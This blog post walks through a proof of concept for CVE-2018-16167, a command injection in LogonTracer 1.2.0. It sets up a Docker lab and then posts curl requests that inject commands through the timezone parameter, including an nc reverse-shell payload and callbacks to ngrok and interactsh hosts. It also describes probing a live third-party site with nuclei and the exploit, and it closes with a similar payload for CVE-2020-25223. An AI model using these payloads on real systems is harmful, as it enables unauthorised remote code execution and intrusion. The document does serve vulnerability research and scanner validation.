PoC for CVE-2018-16167
Posted on May 20, 2024 • 9 minutes • 1840 words
Table of contents
Setup
We analyzed https://github.com/JPCERTCC/LogonTracer/blob/v1.2.0/docker/Dockerfile to understand how to properly run the docker. We need Neo4j container
to be run first, then logontracer container to be linked to. Also, pay attention, without specifying LTHOSTNAME env var logontracer will not run.
docker run -d \
--name neo4j \
-p 7474:7474 \
-p 7687:7687 \
-e NEO4J_AUTH=neo4j/password \
neo4j:3.2.3
docker run -d \
--name logontracer \
--link neo4j \
-p 8080:8080 \
-e LTHOSTNAME=localhost \
jpcertcc/docker-logontracer:v1.2.0
Check:
curl http://localhost:7474
curl http://localhost:8080
To look around inside docker:
docker exec -it logontracer /bin/bash
For example, check open ports:
bash-4.3# netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:7473 0.0.0.0:* LISTEN 11/java
tcp 0 0 0.0.0.0:7474 0.0.0.0:* LISTEN 11/java
tcp 0 0 0.0.0.0:7687 0.0.0.0:* LISTEN 11/java
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 519/python3
As well, we can use docker-compose.yaml:
version: '3.8'
services:
neo4j:
image: neo4j:3.2.3
container_name: neo4j
ports:
- "7474:7474"
- "7687:7687"
environment:
- NEO4J_AUTH=neo4j/password
logontracer:
image: jpcertcc/docker-logontracer:v1.2.0
container_name: logontracer
ports:
- "8080:8080"
environment:
- LTHOSTNAME=localhost
depends_on:
- neo4j
and run it with
docker-compose up -d
and to shutdown
docker-compose down
Poc
The vulnerability is based on that logontracer will execute any command after timezone=1 parameter, see the code below.
Test that the payload is really executed
Using grok
We use ngrok to test the call from logontracer to our nc listener.
Run netcat on port 8888:
nc -lvp 8888
Run ngrok to point to http://localhost:8888:
ngrok http 8888
Now we run curl command to POST to /upload endpoint of logontracer. As a payload we use curl command:
curl -v -X POST http://localhost:8080/upload \
-H "Host: localhost" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;curl -H \"test:1\" https://X.ngrok-free.app/;"
Note: https://X.ngrok-free.app/ is our ngrok url pointing to http://localhost:8888.
We ask logontracer to execute curl -H "test:1" https://X.ngrok-free.app/. We added -H test:1 header to make sure the call is done from our payload. You’ll see why it’s important later when we discuss a wild case of that CVE.
Running the above curl command results:
nc -lvp 8888
Listening on 0.0.0.0 8888
Connection received on localhost 59910
GET / HTTP/1.1
Host: X.ngrok-free.app
User-Agent: curl/7.61.0
Accept: */*
Test: 1
X-Forwarded-For: A.B.C.D
X-Forwarded-Host: X.ngrok-free.app
X-Forwarded-Proto: https
Accept-Encoding: gzip
where A.B.C.D is my test machine external IP.
We can see the test header is got.
Using host.docker.internal url
Accessing nc running on the host machine from docker can be done by replacing localhost:8888 by host.docker.internal:8888 inside the container which is a special url which resolves to the host machine. We need to add extra_hosts to the docker-compose.yaml:
version: '3.8'
services:
neo4j:
image: neo4j:3.2.3
container_name: neo4j
ports:
- "7474:7474"
- "7687:7687"
environment:
- NEO4J_AUTH=neo4j/password
logontracer:
image: jpcertcc/docker-logontracer:v1.2.0
container_name: logontracer
ports:
- "8080:8080"
extra_hosts:
- "host.docker.internal:host-gateway"
environment:
- LTHOSTNAME=localhost
depends_on:
- neo4j
Now, the test looks as:
curl -v -X POST http://localhost:8080/upload \
-H "Host: localhost" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;curl -H \"test:1\" http://host.docker.internal:8888;"
and listening nc displays:
nc -lvp 8888
Listening on 0.0.0.0 8888
Connection received on 172.22.0.3 52396
GET / HTTP/1.1
Host: host.docker.internal:8888
User-Agent: curl/7.61.0
Accept: */*
test:1
Get shell
For that test, we use host.docker.internal url.
We get reverse shell with
curl -v -X POST http://localhost:8080/upload \
-H "Host: localhost" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;nc host.docker.internal 8888 -e /bin/bash;"
The payload is nc host.docker.internal 8888 -e /bin/bash; which runs /bin/bash after connection is established from the docker to the listening nc.
The listening nc gets the connection and we use the shell to run ls:
nc -lvp 8888
Listening on 0.0.0.0 8888
Connection received on 172.22.0.3 37761
ls
LICENSE.txt
README.md
docker
images
logontracer.py
model
requirements.txt
sample
static
templates
Wild-life scanning
There is an interesting false positive we get about that CVE in a wild life.
We run nuclei scanner and found a site with that vulnerability. However, when the above PoC was applied, we did not get the shell. So we started to investigate the case. We ran nuclei with debug switch:
nuclei -t http/cves/2018/CVE-2018-16167.yaml -u https://x.y.z:443 -debug
where x.y.z is the researched site.
The result
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.7
projectdiscovery.io
[INF] Current nuclei version: v3.2.7 (latest)
[INF] Current nuclei-templates version: v9.8.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.fun
[INF] [CVE-2018-16167] Dumped HTTP request for https://x.y.z:443/upload
POST /upload HTTP/1.1
Host: x.y.z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.39 (KHTML, like Gecko) Chrome/89.0.4389.111 Safari/537.39
Connection: close
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fcp6elbcevnbsmo7534vg5w3tqhy1xfgnb.oast.fun%3B
[DBG] [CVE-2018-16167] Dumped HTTP response https://x.y.z:443/upload
HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Cache-Control: no-cache, private
Content-Type: text/html; charset=UTF-8
Date: Tue, 21 May 2024 18:40:49 GMT
Server: nginx
Set-Cookie: funtap_crm=jLIYiYAqPaUCPIaBhtpjabeUDWKCwBU3J6t446RO; expires=Tue, 21-May-2024 20:40:49 GMT; Max-Age=7200; path=/; httponly
Via: 1.1 google
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Server Error</title>
<!-- Fonts -->
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">
<style>
/*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}code{font-family:Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace}svg,video{display:block;vertical-align:middle}video{max-width:100%;height:auto}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity))}.bg-gray-100{--bg-opacity:1;background-color:#f7fafc;background-color:rgba(247,250,252,var(--bg-opacity))}.border-gray-200{--border-opacity:1;border-color:#edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-gray-400{--border-opacity:1;border-color:#cbd5e0;border-color:rgba(203,213,224,var(--border-opacity))}.border-t{border-top-width:1px}.border-r{border-right-width:1px}.flex{display:flex}.grid{display:grid}.hidden{display:none}.items-center{align-items:center}.justify-center{justify-content:center}.font-semibold{font-weight:600}.h-5{height:1.25rem}.h-8{height:2rem}.h-16{height:4rem}.text-sm{font-size:.875rem}.text-lg{font-size:1.125rem}.leading-7{line-height:1.75rem}.mx-auto{margin-left:auto;margin-right:auto}.ml-1{margin-left:.25rem}.mt-2{margin-top:.5rem}.mr-2{margin-right:.5rem}.ml-2{margin-left:.5rem}.mt-4{margin-top:1rem}.ml-4{margin-left:1rem}.mt-8{margin-top:2rem}.ml-12{margin-left:3rem}.-mt-px{margin-top:-1px}.max-w-xl{max-width:36rem}.max-w-6xl{max-width:72rem}.min-h-screen{min-height:100vh}.overflow-hidden{overflow:hidden}.p-6{padding:1.5rem}.py-4{padding-top:1rem;padding-bottom:1rem}.px-4{padding-left:1rem;padding-right:1rem}.px-6{padding-left:1.5rem;padding-right:1.5rem}.pt-8{padding-top:2rem}.fixed{position:fixed}.relative{position:relative}.top-0{top:0}.right-0{right:0}.shadow{box-shadow:0 1px 3px 0 rgba(0,0,0,.1),0 1px 2px 0 rgba(0,0,0,.06)}.text-center{text-align:center}.text-gray-200{--text-opacity:1;color:#edf2f7;color:rgba(237,242,247,var(--text-opacity))}.text-gray-300{--text-opacity:1;color:#e2e8f0;color:rgba(226,232,240,var(--text-opacity))}.text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}.text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#718096;color:rgba(113,128,150,var(--text-opacity))}.text-gray-700{--text-opacity:1;color:#4a5568;color:rgba(74,85,104,var(--text-opacity))}.text-gray-900{--text-opacity:1;color:#1a202c;color:rgba(26,32,44,var(--text-opacity))}.uppercase{text-transform:uppercase}.underline{text-decoration:underline}.antialiased{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.tracking-wider{letter-spacing:.05em}.w-5{width:1.25rem}.w-8{width:2rem}.w-auto{width:auto}.grid-cols-1{grid-template-columns:repeat(1,minmax(0,1fr))}@-webkit-keyframes spin{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}@keyframes spin{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}@-webkit-keyframes ping{0%{transform:scale(1);opacity:1}75%,to{transform:scale(2);opacity:0}}@keyframes ping{0%{transform:scale(1);opacity:1}75%,to{transform:scale(2);opacity:0}}@-webkit-keyframes pulse{0%,to{opacity:1}50%{opacity:.5}}@keyframes pulse{0%,to{opacity:1}50%{opacity:.5}}@-webkit-keyframes bounce{0%,to{transform:translateY(-25%);-webkit-animation-timing-function:cubic-bezier(.8,0,1,1);animation-timing-function:cubic-bezier(.8,0,1,1)}50%{transform:translateY(0);-webkit-animation-timing-function:cubic-bezier(0,0,.2,1);animation-timing-function:cubic-bezier(0,0,.2,1)}}@keyframes bounce{0%,to{transform:translateY(-25%);-webkit-animation-timing-function:cubic-bezier(.8,0,1,1);animation-timing-function:cubic-bezier(.8,0,1,1)}50%{transform:translateY(0);-webkit-animation-timing-function:cubic-bezier(0,0,.2,1);animation-timing-function:cubic-bezier(0,0,.2,1)}}@media (min-width:640px){.sm\:rounded-lg{border-radius:.5rem}.sm\:block{display:block}.sm\:items-center{align-items:center}.sm\:justify-start{justify-content:flex-start}.sm\:justify-between{justify-content:space-between}.sm\:h-20{height:5rem}.sm\:ml-0{margin-left:0}.sm\:px-6{padding-left:1.5rem;padding-right:1.5rem}.sm\:pt-0{padding-top:0}.sm\:text-left{text-align:left}.sm\:text-right{text-align:right}}@media (min-width:768px){.md\:border-t-0{border-top-width:0}.md\:border-l{border-left-width:1px}.md\:grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}}@media (min-width:1024px){.lg\:px-8{padding-left:2rem;padding-right:2rem}}@media (prefers-color-scheme:dark){.dark\:bg-gray-800{--bg-opacity:1;background-color:#2d3748;background-color:rgba(45,55,72,var(--bg-opacity))}.dark\:bg-gray-900{--bg-opacity:1;background-color:#1a202c;background-color:rgba(26,32,44,var(--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text-opacity:1;color:#fff;color:rgba(255,255,255,var(--text-opacity))}.dark\:text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}}
</style>
<style>
body {
font-family: 'Nunito', sans-serif;
}
</style>
</head>
<body class="antialiased">
<div class="relative flex items-top justify-center min-h-screen bg-gray-100 dark:bg-gray-900 sm:items-center sm:pt-0">
<div class="max-w-xl mx-auto sm:px-6 lg:px-8">
<div class="flex items-center pt-8 sm:justify-start sm:pt-0">
<div class="px-4 text-lg text-gray-500 border-r border-gray-400 tracking-wider">
500 </div>
<div class="ml-4 text-lg text-gray-500 uppercase tracking-wider">
Server Error </div>
</div>
</div>
</div>
</body>
</html>
[cp6elbcevnbsmo7534vg5w3tqhy1xfgnb] Received HTTP interaction from 129.124.121.114 at 2024-05-21 18:40:49
------------
HTTP Request
------------
GET / HTTP/1.1
Host: cp6elbcevnbsmo7534vg5w3tqhy1xfgnb.oast.fun
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, br
Accept-Language: en-US,en;q=0.5
Cookie: euConsent=true; BCPermissionLevel=PERSONAL; BC_GDPR=11111; fhCookieConsent=true; gdpr-source=GB; gdpr_consent=YES; beget=begetok; SOCS=CAISNQgEEitib3FfaWRlbnRpdHlmcm9udGVuZHVpc2VydmVyXzIwMjMwNzIzLjA5X3AwGgJlbiACGgYIgMSBpgY
User-Agent: TelegramBot (like TwitterBot)
------------
HTTP Response
------------
HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.fun
X-Interactsh-Version: 1.1.8
<html><head></head><body>bngfx1yhqt3w5gv4357omsbnvecble6pc</body></html>
[CVE-2018-16167:word-1] [http] [critical] https://x.y.z:443/upload
Nuclei template for the test:
id: CVE-2018-16167
info:
name: LogonTracer <=1.2.0 - Remote Command Injection
author: gy741
severity: critical
description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
reference:
- https://www.exploit-db.com/exploits/49918
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
- https://jvn.jp/en/vu/JVNVU98026636/index.html
- https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-16167
cwe-id: CWE-78
tags: rce,oast,edb,cve,cve2018,logontracer
requests:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/12
We can see, the payload used by the template is
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
which is when url-decoded:
logtype=XML&timezone=1;wget http://{{interactsh-url}};
Let’s re-check that test using our interactsh client:
interactsh-client -v
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/
projectdiscovery.io
[INF] Current interactsh version 1.1.9 (latest)
[INF] Listing 1 payload for OOB Testing
[INF] cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site
and run our PoC:
curl -v -X POST http://x.y.z/upload \
-H "Host: x.y.z" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;curl http://cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site;"
and we get the response:
interactsh-client -v
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/
projectdiscovery.io
[INF] Current interactsh version 1.1.9 (latest)
[INF] Listing 1 payload for OOB Testing
[INF] cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site
[cp6f0fcevnbs87tv6ko0jw41icdjimes5] Received DNS interaction (A) from 91.108.8.3 at 2024-05-21 19:05:32
-----------
DNS Request
-----------
;; opcode: QUERY, status: NOERROR, id: 36887
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site. IN A
------------
DNS Response
------------
;; opcode: QUERY, status: NOERROR, id: 36887
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site. IN A
;; ANSWER SECTION:
cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site. 3600 IN A 178.128.16.97
;; AUTHORITY SECTION:
cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site. 3600 IN NS ns1.oast.site.
cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site. 3600 IN NS ns2.oast.site.
;; ADDITIONAL SECTION:
ns1.oast.site. 3600 IN A 178.128.16.97
ns2.oast.site. 3600 IN A 178.128.16.97
[cp6f0fcevnbs87tv6ko0jw41icdjimes5] Received HTTP interaction from 129.15.11.205 at 2024-05-21 19:05:33
------------
HTTP Request
------------
GET / HTTP/1.1
Host: cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, br
Accept-Language: en-US,en;q=0.5
Cookie: euConsent=true; BCPermissionLevel=PERSONAL; BC_GDPR=11111; fhCookieConsent=true; gdpr-source=GB; gdpr_consent=YES; beget=begetok; SOCS=CAISNQgEEitib3FfaWRlbnRpdHlmcm9udGVuZHVpc2VydmVyXzIwMjMwNzIzLjA5X3AwGgJlbiACGgYIgMSBpgY
User-Agent: TelegramBot (like TwitterBot)
-------------
HTTP Response
-------------
HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.site
X-Interactsh-Version: 1.1.8
<html><head></head><body>5semijdci14wj0ok6vt78sbnvecf0f6pc</body></html>
[cp6f0fcevnbs87tv6ko0jw41icdjimes5] Received HTTP interaction from 129.154.61.221 at 2024-05-21 19:05:33
------------
HTTP Request
------------
GET / HTTP/1.1
Host: cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, br
Accept-Language: en-US,en;q=0.5
Cookie: euConsent=true; BCPermissionLevel=PERSONAL; BC_GDPR=11111; fhCookieConsent=true; gdpr-source=GB; gdpr_consent=YES; beget=begetok; SOCS=CAISNQgEEitib3FfaWRlbnRpdHlmcm9udGVuZHVpc2VydmVyXzIwMjMwNzIzLjA5X3AwGgJlbiACGgYIgMSBpgY
User-Agent: TelegramBot (like TwitterBot)
-------------
HTTP Response
-------------
HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.site
X-Interactsh-Version: 1.1.8
<html><head></head><body>5semijdci14wj0ok6vt78sbnvecf0f6pc</body></html>
Ok, we see nuclei was not cheating. But what if we remove curl from the payload at all and leave only url:
curl -v -X POST http://x.y.z/upload \
-H "Host: x.y.z" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;http://cp6f4esevnbs8rv5qpe05oaynu6ngdjey.oast.live;"
Note: For every test with interactsh url we use a new url; the previous once are not reusable, probably the software we try to get into bans them.
Wow! We got the response! So, the software we try to upload our payout ignores the command but accepts url and makes call to it. As noted above, it does it only once, then a new url is needed. Of course, we could not upload any payload as we cannot execute any command on the target.
PS
Very similar vulnerability is CVE-2020-25223. The same mechanism is used:
curl -X POST https://targetserver.com/var \
-H "Host: targetserver.com" \
-H "Accept: text/javascript, text/html, application/xml, text/xml, */*" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate" \
-H "X-Requested-With: XMLHttpRequest" \
-H "X-Prototype-Version: 1.5.1.1" \
-H "Content-Type: application/json; charset=UTF-8" \
-H "Origin: https://targetserver.com" \
-H "Connection: close" \
-H "Referer: https://targetserver.com" \
-H "Sec-Fetch-Dest: empty" \
-H "Sec-Fetch-Mode: cors" \
-H "Sec-Fetch-Site: same-origin" \
--data '{"objs": [{"FID": "init"}], "SID": "|wget http://<interactsh-url>|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}'
Share
Tags
Counters
